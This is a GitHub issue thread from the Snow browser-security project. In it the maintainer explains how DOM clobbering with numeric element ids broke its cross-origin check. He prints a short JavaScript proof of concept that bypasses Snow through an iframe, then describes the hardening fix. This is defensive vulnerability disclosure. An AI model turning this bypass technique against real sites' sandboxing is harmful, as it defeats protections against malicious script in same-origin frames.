Implement is-cross-origin internally so it doesn't throw

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!

https://lavamoat.github.io/snow/demo/

MIT License

100 stars 9 forks source link

Implement is-cross-origin internally so it doesn't throw #111

Closed weizman closed 1 year ago

weizman commented 1 year ago

is-cross-origin throws if received object isn't a window
this apparently is possible (dom clobbering with indexes 😱)
no reason for it to throw, just continue to next window in frames array
in fact, no reason for this to be an external package at all, implement internally instead
- making Snow a deps-free project 🎉

weizman commented 1 year ago

This allowed Snow bypass:

(function(){
    const ifr = document.createElement('iframe');
    const ifr2 = document.createElement('iframe');
    document.body.appendChild(ifr);
    const div = document.createElement('div');
    div.id='0';
    setTimeout(() => { ifr2.contentWindow.alert.call(top,1); }, 500);
    try { ifr.contentWindow.document.body.appendChild(div); } catch {}
    document.body.appendChild(ifr2);
}());

weizman commented 1 year ago

Update, #111 was not strong enough, the isWindow function could have been easily bypassed, e2cf42e introduces a hardening fix to that (instead of walking the frames array until there's nothing in there, walk it according to the length prop. That way we only walk through windows and not through windows + clobbered elements)